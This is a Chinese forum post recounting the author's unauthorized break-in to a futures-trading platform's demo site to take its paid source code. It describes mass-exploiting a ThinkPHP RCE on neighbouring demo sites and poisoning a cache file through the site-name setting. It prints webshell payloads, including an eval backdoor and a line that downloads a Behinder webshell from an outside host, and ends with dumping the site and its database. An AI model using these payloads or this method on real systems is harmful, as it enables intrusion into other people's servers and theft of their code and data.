搜索
    Hi~登录注册
    查看: 289|回复: 0
    收起左侧

    记一次对某期货系统演示站的渗透

    [复制链接]

    20

    主题

    0

    精华

    17 小时

    在线时间

    密圈

    积分
    19
    发表于 2019-8-24 10:33:12 | 显示全部楼层 |阅读模式
    朋友发来一套演示站,让我看看能不能搞到源码,便有了此次渗透

    xxx.cn/(前台13800138000密码123456)xxx.cn/index.php/Admin/Index/index(后台adminxxx密码123456)xxx.cn/index.php/Daili(代理)xxx.cn/index.php/Staff(员工)
    先登录前台看看 有点眼熟 基于某系统二开的版本

    HK_Security_1566613709.png

    后台经FUZZ没能实现任意文件上传
    系统基于ThinkPHP3.2.0 查看大佬整理的漏洞列表


    发现后台存在update注入

    由于局限性以及权限等问题 并没有成功getshell


    然后看到这篇文章

    thinkphp缓存getshell
    但是目前只知道缓存文件在 /Application/Runtime/Temp/ 目录下

    无法获知具体文件名

    由于这个系统是根据老系统二开的版本 所以我想到去搞一套老系统的源码

    获取旧系统的缓存文件来进行匹配


    所以百度上搜索在几个比较大的源码站上搜索期货源码

    找到了老版本系统源码


    HK_Security_1566613760.png

    这老款系统也要钱 但我们一开始的目的就是不花钱 怎么整呢

    发现这个网站演示站的链接为 1234.xxxx.com

    1234为此源码的ID 而这种演示站一般会有很多个搭建在同一台服务器上

    报错路径跟肯定了我的想法

    所以直接burp遍历1000-2000的ID 批量访问 index.php?s=captcha

    利用tp5 rce漏洞 随便找一个存在验证码漏洞的演示 getshell即可

    由于这种源码都并非最新 一般都不会升级tp更别说是这种演示站了

    所以很快就getshell

    然后根据id找到我需要的演示站 把源码下载下来

    获取temp目录下所有缓存文件名

    HK_Security_1566613810.png

    burp构造intruder

    HK_Security_1566613837.png

    获取到两个返回值200的路径


    在本地缓存上查看 其中一个是系统配置的缓存

    包含网站名称 公告等内容


    HK_Security_1566613863.png



    本地测试后台构造网站名称为

    [PHP] 纯文本查看 复制代码
    ?><?php eval($_POST['a']);#

    前台访问刷新缓存

    HK_Security_1566613910.png

    成功getshell

    上演示站后台使用相同方法 成功getshell
    然后蚁剑连接shell
    连接被重置

    请教论坛老哥
    写入

    [PHP] 纯文本查看 复制代码
    ?><?php file_put_contents('1.php',file_get_contents('http://xxx.com/1.txt')) ?>#

    1.txt内放冰蝎的马子

    再次访问缓存 冰蝎连接成功

    最后php打包整站程序 上传adminer打包数据库 走人~









    上一篇:disucz js 监听密码
    下一篇:最高的qq等级是多少?
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表